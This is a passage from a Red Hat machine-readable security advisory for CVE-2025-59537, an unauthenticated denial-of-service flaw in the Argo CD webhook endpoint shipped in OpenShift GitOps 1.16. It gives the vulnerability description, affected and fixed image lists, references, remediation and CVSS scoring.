"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: argocd-server: gitops: Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload"
},
{
"cve": "CVE-2025-59537",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2025-10-01T22:00:51.264122+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400938"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd: Argo CD unauthenticated Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo-CD application. General host availability is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59537"
},
{
"category": "external",
"summary": "RHBZ#2400938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59537",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59537"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43",
"url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
}
],
"release_date": "2025-10-01T21:01:36.519000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:47:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17730"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
